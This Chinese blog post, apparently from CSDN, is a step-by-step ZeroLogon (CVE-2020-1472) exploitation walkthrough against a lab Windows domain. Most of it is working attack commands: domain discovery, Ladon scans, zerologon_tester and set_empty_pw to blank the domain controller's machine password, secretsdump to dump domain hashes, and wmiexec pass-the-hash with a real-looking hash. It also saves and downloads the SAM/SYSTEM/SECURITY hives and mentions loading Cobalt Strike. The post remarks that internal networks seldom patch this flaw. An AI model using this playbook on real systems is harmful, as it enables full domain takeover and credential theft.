内网定位+CVE-2020-1472-利用过程

已于 2022-01-25 23:24:39 修改
阅读量263 收藏
点赞数
分类专栏: 内网渗透 文章标签: 安全
于 2021-04-01 21:34:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/115385035
版权
域控(Win2008):192.168.199.131
域用户(Win7):192.168.199.128
域用户(Win03):192.168.199.129
利用+重置工具:https://github.com/risksense/zerologon
重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472
工具运行环境:https://github.com/SecureAuthCorp/impacket
1、假设已经通过 frp 代理到内网
2、判断域方法
(1)可以通过扫描是否开放端口:53(dns)、389(ldap)、445(rdp), 满足这几个条件,就可以判断是个域,可以尝试验证漏洞是否存在,因为内网修
这个洞的非常少,没人关注
(2)通过 nbtstat 命令
Usage:nbtstat -A 当前 IP
Usage:ping 域.com
(3)查看 systeminfo
Usage:systeminfo
(4)查看主机 dns
Usage:nslookup
(5)查看当前登录域
Usage:net config workstation
3、用拉登的 cs 插件扫 ldap
Usage:Ladon.exe 域地址 LdapScan
Example:Ladon.exe 192.168.199.1/24 LdapScan
(图中 IS_LDAP 表示确定 192.168.199.131 是域控)
3、确定域后用拉登确定域主机名
Usage:Ladon.exe 域地址 OsScan
Example:Ladon.exe 192.168.199.131 OsScan
HKServer.com\YUKONG(HKServer 是,YUKONG 是域主机名)
4、用验证脚本测试是否存在(测试存在) Usage:python3 zerologon_tester.py 域主机名 域地址
Example:python3 zerologon_tester.py YUKONG 192.168.199.131

5、再用 set_empty_pw 脚本测试
Usage: set_empty_pw.py <dc-name> <dc-ip>
Example:python3 set_empty_pw.py YUKONG 192.168.199.131
大概利用方法就是把域用户密码清空,用空密码连上去 dump 管理员的 hash
6、利用 secretsdump 脚本 dump 用户 hash
Usage:python3 secretsdump.py "域/主机名$"@域地址 -just-dc -no-pass
Example:
python3
secretsdump.py
"HKServer/YUKONG$"@192.168.199.131
-just-dc -no-pass
执行 dump 可以看到 YUKONG$用户的密码已经被重置成空密码,31d6cfe......
因为把域密码重置为空,所以-no-pass 就行了,在用户过多的情况下可以单独
dump administrator 的 hash
命令改成:-just-dc-user "administrator" 就 ok,见下图
7、利用 wmiexec 脚本横向连接(连接后恢复原始 hash)
Usage:
python3
wmiexec.py
域 /administrator@ 域 地 址
-hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
Example:
python3 wmiexec.py HKServer/administrator@192.168.199.131 -hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
已经连上来了,可以上 cs,或者加管理员登录上去看都行,主要是恢复密码
先备份注册表(依次命令一遍):
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
(save 后缀的文件会下载到你 wmiexec 脚本的同目录)
8、再用 secretsdump 脚本获取原始 hash
直接退出来命令:
python3 secretsdump.py -sam sam.save -system system.save -security
security.save LOCAL
9、最后用 reinstall_original_pw 脚本恢复
Usage:python3 reinstall_original_pw.py
主机名 域地址
hash
Example:
python3
reinstall_original_pw.py
YUKONG
192.168.199.131
30f90a3bfe2f085a880dcf954a8825f4
10、可能会出现没有 hash 的情况,可以用 restorepassword 脚本恢复 hexpass
取第 8 步中 plan_password_hex 字段
Usage:python3 restorepassword.py DC@DC -target-ip 域地址 -hexpass
Example : python3
restorepassword.py YUKONG@YUKONG -target-ip
192.168.199.131
-hexpass
8dac4a096eec66839507b9018ace3e1ac2e27e4e81455eda7ee9e49d86a
2c57619740204e76571e512144a72c67d01e21a7d6b0c13ed4cebc97442
e1f9e75b6943c8fe4a67c0c8c6dfd0046624dd174b2dba468df3303a54a4
1be3f415f19f7cf25ae6f730cda6d125e5ebf480161b3bd9d4da2dca2f215f
01ba6b26603b8e36fd3bd86c3cb9ebba159da747df883125e6d00cbe105
c270c866d904b166bf6356f45572df5ed37976561da201e954074484b2d
b4462ae6c3d35fc0350feab07ea8868952fd8e84d9d5b66df6542e0f41a1e
283bb09c6cebfb2bb41fdc2b4d0a1ef8f5b2a94b2c3741c79f05c4edca170
11、用第 7 步看看是不是真的恢复了
恢复了,然后这时候假装已经通过 curl 之类的命令上了 cs,或者已经得到明文
密码,就算打下了
小韩韩啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7096
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472 NetLogon 权限提升漏洞
qq_53579360的博客
02-07 847
windows
域内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5515
前一段时间打ctf第一次接触域渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
【域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞
做自己喜欢的事,并将其发挥到极致!
06-23 2377
本篇文章仅用于技术研究和学习,切勿利用文中提及手段非法渗透攻击,造成任何后果与本作者无关,切记!CVE-2020-1472 NetLogon 权限提升漏洞原因是未经身份认证的攻击者可通过使用NetLogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权限。Netlogon 是在活动目录中比较重要的一个服务,此服务在 DC 和域成员服务器上运行,为域身份验证提供重要服务。...
NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决
Love&Share
09-17 1万+
NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9170
本文作者:Faith(Ms08067实验室 内安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内提权漏洞,影响Windows Serv...
(环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞
daxi0ng的博客
01-25 3888
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1370
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 Z
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。
CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)
Zyecho的博客
10-21 1251
CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建),详细记录了CVE-2020-1472复现,将域控中保存在AD中的管理员password设置为空。
域内提权之CVE-2020-1472复现打域控
good good study
03-18 4350
CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程过程中,由于错误的使⽤了 AES-CFB8 加密所导致漏洞成因,该漏洞适⽤于 Win2008 后的所有版本 利用场景:获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接...
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
CVE-2020-1472 Netlogon权限提升漏洞分析
further_eye的博客
11-09 1093
该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。
CVE-2020-1472
最新发布
08-30
为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值